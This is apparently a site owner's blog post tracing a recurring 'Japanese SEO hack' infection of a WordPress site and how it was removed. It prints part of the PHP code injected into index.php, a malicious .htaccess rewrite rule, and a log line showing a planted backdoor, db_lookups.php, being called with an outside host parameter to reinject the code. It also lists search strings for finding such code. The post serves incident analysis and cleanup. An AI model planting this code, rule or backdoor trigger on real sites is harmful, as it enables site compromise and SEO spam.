Japanese seo hack WordPress

Japanese seo in google

Ever encountered php unknown code injected at top of your index.php file? I have same issue in my WordPress website where some unknown php scripts was injected at top of index.php file. Below is the sample of that php code:

<?php 
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = 'mapss271.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}
else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
--- CODE CHOPPED ---

So, next thing to get rid of this is to delete the injected code right? I deleted the injected code and I left with no malwares anymore.

Next day, I got alert from my malware scanning system that index.php is infected with malware again. I logged into the server and found same code at the top of my index.php file. I thought that something is going on here. I know that my WordPress was hacked but I wanted to know how this malicious php script keep on injected in index.php file. Then, I started searching for strings which are used in this kind of php script or lets say hacker use it. To name few:

eval
md5($_POST
getcwd()

I got many outputs. I looked at each and every file that I found. While analyzing files, I found one file which looks innocent but was suspicious. The filename was “db_lookups.php” under folder /public_html/wp-admin/network/. I then checked if that file comes with default installation of WordPress or not from https://github.com/WordPress/WordPress and compared. There was no such file called db_lookups.php in WordPress.

I directly tried to browse this file from browser. Browser output “ok” only.

If you want to analyze this php code inside db_lookups.php file then here it is. Click here.

Next, there is something it is doing in index.php and .htaccess file right? I then checked my .htaccess file:

# BEGIN WordPress

RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7})/$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

Default WordPress installation do not include “RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7})/$ index.php?tempweb=$1&smid=$2 [L]” line. You can check from here https://codex.wordpress.org/htaccess

I then checked the log if someone have accessed this db_lookups.php file. I found following GET request.

104.223.140.126 - - [19/Sep/2017:10:47:40 +1000] "GET /wp-admin/network/db_lookups.php?u=i&m=UJSLJ7JVSK9U&web=chargespeed.pw&k=r HTTP/1.1" 200 171 "-" "Googlebot"

To check if this is what I was looking for, if this triggered injection or not, I first removed injected code from index.php and enter following in browser

example.com/wp-admin/network/db_lookups.php?u=i&m=UJSLJ7JVSK9U&web=chargespeed.pw&k=r

I then checked my index.php file and there was the injected malicious php code.

This is in my scenario, yours may be different, different cms, different filename, etc. If you are using WordPress then you should install fresh copy of it by removing all old files.

Related

Fixing the japanese keyword hack

Leave a Reply

Your email address will not be published. Required fields are marked *